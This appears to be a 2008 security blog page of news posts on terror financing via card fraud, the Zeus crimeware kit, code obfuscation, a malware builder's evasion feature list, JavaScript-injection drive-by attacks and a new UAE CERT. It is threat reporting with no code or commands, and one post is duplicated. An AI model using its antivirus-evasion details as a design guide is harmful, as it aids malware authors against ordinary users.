Credit card fraud might have played role in financing Mumbai terror attacks, expert suggests

•December 4, 2008 • 1 Comment

Indian authorities have recovered $1,200 and several credit cards from a backpack carried by one of the terrorists who assailed ten targets in Mumbai, killing at least 172 people and injuring hundreds of others, according to press
reports. The presence of the cards might signal that credit card fraud helped fund the terror attacks, Dennis Lormel, an anti-money laundering consultant who once led the Federal Bureau of Investigation’s anti-terrorist financing unit, told Complinet.
The credit cards in question reportedly were issued by Citibank, HSBC, ICICI Bank, Axis Bank, HDFC Bank and
State Bank of Mauritius. “I’m interested in the potential credit card fraud as a funding source and operational support mechanism,” Lormel said. For Lormel, the possible link between credit card fraud and the Mumbai terrorist attacks is more than a fleeting interest. He has long feared that terrorists are becoming increasingly adept at generating funds through such illicit schemes; he recently wrote a white paper in which he dubbed credit card fraud a “growth industry” for terrorists. “There is no empirical statistical data establishing the nexus between credit card exploitation and terrorism, but there are ample anecdotal case studies demonstrating how extensively terrorists rely on credit card information in furtherance of their heinous activities,” Lormel wrote in his paper.

Alternative funding sources

Lormel added that a previous Complinet article examining how the Mumbai attacks might have been funded
“presents interesting and viable possible funding sources.”
“It’s highly likely hawalas were used. Wealthy individual donors and charities could be funding sources, as pointed out. It will be interesting to determine if drugs and other criminal activities contributed. Likewise, the nexus between Dawood Ibrahim and the attack should be one of the highest investigative priorities,” he said.
“The attack itself will play out to be inexpensive. The overall operation will be much costlier when you factor in the
training and subsistence of the attackers and their logistical support element.”
Still, Lormel conceded that it may be some time before authorities can say with any degree of certainty how the
murderous rampage was funded. “It’s too early to understand the scope of the funding for the attacks,” he said.

Advertisements

Nobel Laureate is the father of Kevin Mitnick investigator | Zero Day | ZDNet.com

•October 17, 2008 • Leave a Comment

Nobel Laureate is the father of Kevin Mitnick investigator | Zero Day | ZDNet.com

Crimeware get easy and progressively harder to fight

•October 17, 2008 • Leave a Comment

The Zeus Trojan kit is not anything that new. It has been available on the market for around $700, and has been used more than 150 times in attacks around 4,000 computers per day as reported by stopBADware, the online malware resource.
Some additional background:

1. The Zeus Trojan is a kit for sale: Anyone in the criminal community can purchase it for roughly $700. In the past 6 months RSA’s Anti-Fraud Command Center has detected more than 150 different uses of the Zeus kit, each one infecting on average roughly 4,000 different computers a day.

2. Resistance to detection: The kit purchased is a binary generator. Each use creates a new binary file, and these files are radically different from each other — making them notoriously difficult for anti-virus or security software to detect. To date very few variants have had effective anti-virus signatures against them and each use of the kit usually makes existing signatures ineffective. Just like in most cases, this particular use of the Zeus kit did not have any anti-virus detection (with the popular engines we tested) at the time of this writing.

3. Rich feature set: the Zeus Trojan has many startling capabilities. In addition to listening in on the submission of forms in the browser, the Trojan also has advanced capabilities, for instance the ability to take screenshots of a victim’s machine, or control it remotely, or add additional pages to a website and monitor it, or steal passwords that have been stored by popular programs (remember when you clicked on the “Remember this password?” checkbox?)… And the features-list goes on.

In an additional twist, the Russian Business Network, which has been associated with creation and distribution of the Zeus kit, is actively working to protect their intellectual property from security companies and their customers. RBN has threatened to sue security companies for blacklisting their products.
In a trend to see this going even more mainstream we have seen a common Web 2.0 mentality is that the more people use the service, the better it gets, a mode of thinking we could see applied in the case of open source malware, and malware as a web service. Once the source code becomes publicly obtainable, it’s not just new features and modules that get introduced, but also, the malware starts using the Web as a platform.

Some of the most popular open source badware code kits are successfully building communities around this open source nature, attracting criminal innovation behalf of third-party coders.

And so we are begging to see a demand for “quality of service” which has lead to commercial code obfuscation software such as Code Virtualizer. “Code Virtualizer will convert your original code (Intel x86 instructions) into Virtual Opcodes that will only be understood by an internal Virtual Machine. Those Virtual Opcodes and the Virtual Machine itself are unique for every protected application, avoiding a general attack over Code Virtualizer. Code Virtualizer can protect your sensitive code areas in any x32 and x64 native PE files (like executable files/EXEs, system services, DLLs , OCXs , ActiveX controls, screen savers and device drivers).

Modified Code
Code Virtualizer can generate multiple types of virtual machines with a different instruction set for each one. This means that a specific block of Intel x86 instructions can be converted into different instruction set for each machine, preventing an attacker from recognizing any generated virtual opcode after the transformation from x86 instructions. The following picture represents how a block of Intel x86 instructions is converted into different kinds of virtual opcodes, which could be emulated by different virtual machines.

When an attacker tries to decompile a block of code that was protected by Code Virtualizer, he will not find the original x86 instructions. Instead, he will find a completely new instruction set which is not recognized by him or any other special decompiler. This will force the attacker to go through the extremely hard work of identifying how each opcode is executed and how the specific virtual machine works for each protected application. Code Virtualizer totally obfuscates the execution of the virtual opcodes and the study of each unique virtual machine in order to prevent someone from studying how the virtual opcodes are executed.”
Cvprotopt

Technorati Tags: , ,

Crimeware get easy and progressively harder to fight

•October 10, 2008 • Leave a Comment

The Zeus Trojan kit is not anything that new. It has been available on the market for around $700, and has been used more than 150 times in attacks around 4,000 computers per day as reported by stopBADware, the online malware resource.
Some additional background:

1. The Zeus Trojan is a kit for sale: Anyone in the criminal community can purchase it for roughly $700. In the past 6 months RSA’s Anti-Fraud Command Center has detected more than 150 different uses of the Zeus kit, each one infecting on average roughly 4,000 different computers a day.

2. Resistance to detection: The kit purchased is a binary generator. Each use creates a new binary file, and these files are radically different from each other — making them notoriously difficult for anti-virus or security software to detect. To date very few variants have had effective anti-virus signatures against them and each use of the kit usually makes existing signatures ineffective. Just like in most cases, this particular use of the Zeus kit did not have any anti-virus detection (with the popular engines we tested) at the time of this writing.

3. Rich feature set: the Zeus Trojan has many startling capabilities. In addition to listening in on the submission of forms in the browser, the Trojan also has advanced capabilities, for instance the ability to take screenshots of a victim’s machine, or control it remotely, or add additional pages to a website and monitor it, or steal passwords that have been stored by popular programs (remember when you clicked on the “Remember this password?” checkbox?)… And the features-list goes on.

In an additional twist, the Russian Business Network, which has been associated with creation and distribution of the Zeus kit, is actively working to protect their intellectual property from security companies and their customers. RBN has threatened to sue security companies for blacklisting their products.
In a trend to see this going even more mainstream we have seen a common Web 2.0 mentality is that the more people use the service, the better it gets, a mode of thinking we could see applied in the case of open source malware, and malware as a web service. Once the source code becomes publicly obtainable, it’s not just new features and modules that get introduced, but also, the malware starts using the Web as a platform.

Some of the most popular open source badware code kits are successfully building communities around this open source nature, attracting criminal innovation behalf of third-party coders.

And so we are begging to see a demand for “quality of service” which has lead to commercial code obfuscation software such as Code Virtualizer. “Code Virtualizer will convert your original code (Intel x86 instructions) into Virtual Opcodes that will only be understood by an internal Virtual Machine. Those Virtual Opcodes and the Virtual Machine itself are unique for every protected application, avoiding a general attack over Code Virtualizer. Code Virtualizer can protect your sensitive code areas in any x32 and x64 native PE files (like executable files/EXEs, system services, DLLs , OCXs , ActiveX controls, screen savers and device drivers).

Modified Code
Code Virtualizer can generate multiple types of virtual machines with a different instruction set for each one. This means that a specific block of Intel x86 instructions can be converted into different instruction set for each machine, preventing an attacker from recognizing any generated virtual opcode after the transformation from x86 instructions. The following picture represents how a block of Intel x86 instructions is converted into different kinds of virtual opcodes, which could be emulated by different virtual machines.

When an attacker tries to decompile a block of code that was protected by Code Virtualizer, he will not find the original x86 instructions. Instead, he will find a completely new instruction set which is not recognized by him or any other special decompiler. This will force the attacker to go through the extremely hard work of identifying how each opcode is executed and how the specific virtual machine works for each protected application. Code Virtualizer totally obfuscates the execution of the virtual opcodes and the study of each unique virtual machine in order to prevent someone from studying how the virtual opcodes are executed.”
Cvprotopt

Web Based Malware Gets Smart(er) and Nasty

•October 7, 2008 • Leave a Comment

The ongoing development of web based malware, we see the escalation of features along with the commoditization of anti-debugging features within modern malware. “Plain” simple feature sets started off to include what these malware creators are describing as managed binary crypting and firewall bypassing verification on demand in February of this year, to has matured to August’s overall anti antivirus software mentality as a key differentiation factor of malware.

So what new features are they working on? Anti tracing and emulation protection, PeID and PESniffer protection, as well as anti heuristic scanning .

200810070922-1

Here’s a translated description (courtesy of the fine minds at Kasperksy) :

“- The binary works under admin and under normal user
– The binary is always run as the “current user”
– An unlimited number of bots can be loaded and integrated within the command and control, and with the geolocation feature, filters can be applied for a particular country
-After successful infection, the binary which is tested against popular firewall and proactive protection security ensures that the actions it takes and their order do not trigger protactive protection mechanisms in place
– binary file size is 25k, the size can be reduced once it’s crypted

200810070922

– Doesn’t take advantage of BITS protocol
– Doesn’t allow an infected host to be infected twice
– Bypassing NAT and supporting “always-on” connections
– A simple, easy to configure web based admin panel”

JavaScript Injection Attack JavaScript Injection Attack JavaScript Injection Attack

•September 30, 2008 • Leave a Comment

JavaScript injection attacks seem to be the in thing these days. Malware writers are increasingly utilizing such attacks as a better means to spread their work.

As little as a year ago, the bad guys were dependent on enticing people to follow links that pointed to malicious websites (via e-mail, search links, or IM worms). Today, they are using JavaScript injection attacks to simply “steal” a website’s visitors, and it has become something of a Swiss Army Knife for underground hackers to spread their malware worldwide.

JS Injection

We’ve seen numerous high traffic, legitimate websites attacked using this technique. One recent example is MegaGames, a very popular U.S. gaming portal with a 3172 rank in Alexa. The JavaScript injection attack successfully exploited one of MegaGames’ servers to insert a couple extra lines of code. This addition redirects unsuspecting website visitors to a malicious European site where the main infection attempts are carried out.

The malicious site attempts two different methods to attack its visitors. The first is an attempt to exploit a Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability (MS06-014).

JS Attack

This attack would only affect website visitors using versions of Microsoft’s Internet Explorer (IE) browser, as the website basically requires visitors to use an ActiveX Control, then uses a loophole in the way the ActiveX Control interacts with the IE browser to provide remote attackers complete control over a victim’s system.

The second attack attempted is a drive-by download, which affects not only the IE browsers, but also Firefox 1.0 & 2.0 browsers. This attack uses JavaScript to detect the browser’s type, then uses Adobe Flash exploits to download and execute a malicious binary file onto the system.

Flash Exploits

The MegaGames website is currently still compromised and its misfortune illustrates a good point. Many Internet users are under the impression that they can only get infected with malware if they visit “obviously risky” (dodgy) websites, such as “pr0n” or “warez” sites. Unfortunately, that’s not true. Malware writers have been getting more sophisticated and today, even legitimate news or business sites can get surreptitiously compromised.

Another good example that no site is safe — BusinessWeek.com — a very legitimate and high traffic site. It has fallen victim to an SQL Injection attack, and such attacks inject JavaScript…

UAE gets new special anti-cybercrime body

•September 30, 2008 • Leave a Comment

Note: I will be visiting Dubai to follow up on a number of CyberCrime activity.

Cybersecurity in the United Arab Emirates has just got tighter following the announcement of the creation of the UAE Computer Emergency Response Team. The UAE’s Telecom Regulatory Authority has tasked this new group, which will start operations this year, with fighting cybercrime in the country.

The official unveiling of aeCERT has been made at the inaugural Deep Knowledge Security Conference, attended by regional and international cybersecurity experts. Mohammed Nasser Al Ghanim, director of the UAE’s Telecom Regulatory Authority, spoke of the need to create such a unit given the growing problems surrounding cybercrime in the region. “This year, the UAE counteracted many attacks, mainly website defacement, phishing attacks and many others. These attacks caused immense damage to the businesses,” said Al Ghanim.

A quick start to operations has been promised, as aeCERT should come online by the end of 2007. “The team will begin operation by the fourth quarter of this year. It will be comprehensive and help prevent much Internet crime,” said Fatma Bazarghan, who will head the new hi-tech unit. The UAE lately has been the focus of attention regarding cybercrime in the Gulf, as a large cyberfraud gang offering bogus services from the Dubai International Finance Centre was dismantled. Even more recently the authorities thwarted a hacking attempt on the Dubai eGovernment computer network, and the UAE are regional leaders in terms of sheer numbers of cyberattacks. However, much has also been done to safeguard online safety in the country with the adoption of strict anti-cybercrime laws in 2006. The establishment of the new crime-fighting group is another step in the right direction for the UAE.

Technorati Tags: ,